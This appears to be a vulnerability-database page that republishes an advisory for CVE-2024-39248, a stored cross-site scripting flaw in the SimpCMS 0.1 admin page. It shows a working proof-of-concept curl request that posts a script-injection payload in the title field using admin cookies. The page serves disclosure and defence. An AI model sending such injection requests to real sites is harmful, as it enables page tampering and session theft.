Lucene search
K

SimpCMS 0.1 Cross Site Scripting

🗓️ 27 Jun 2024 00:00:00Reported by Jason JacobsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 311 Views

SimpCMS 0.1 Cross Site Scripting via admin interfac

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cross-site Scripting in Fikeulous Simpcms
26 Jun 202421:06
githubexploit
CNNVD
SimpCMS 安全漏洞
3 Jul 202400:00
cnnvd
CNVD
SimpCMS Cross-Site Scripting Vulnerability
5 Jul 202400:00
cnvd
CVE
CVE-2024-39248
3 Jul 202400:00
cve
Cvelist
CVE-2024-39248
3 Jul 202400:00
cvelist
EUVD
EUVD-2024-37878
3 Oct 202520:07
euvd
NVD
CVE-2024-39248
3 Jul 202417:15
nvd
OSV
CVE-2024-39248
3 Jul 202417:15
osv
Positive Technologies
PT-2024-28408 · Simpcms · Simpcms
3 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-39248
9 Jan 202609:32
redhatcve
Rows per page
`# Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)  
# Date: 26-06-2024  
# CVE: CVE-2024-39248  
# Exploit Author: Jason Jacobs (0xjason_jacobs)  
# Vendor Homepage: https://sourceforge.net/projects/simpcms/  
# Software Link: https://sourceforge.net/projects/simpcms/  
  
# Category: Web Application  
# Version: 0.1  
# Vulnerable endpoint: /SimpCMS/admin.php  
  
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:  
  
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"  
  
Explanation:  
- curl: The command-line tool for transferring data with URLs.  
- -X POST: Specifies the request method to use (POST).  
- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.  
- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.  
  
Run this command in your terminal to send the POST request with the XSS payload.  
Visit the /SimpCMS main site and the XSS will be visible.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.01537
311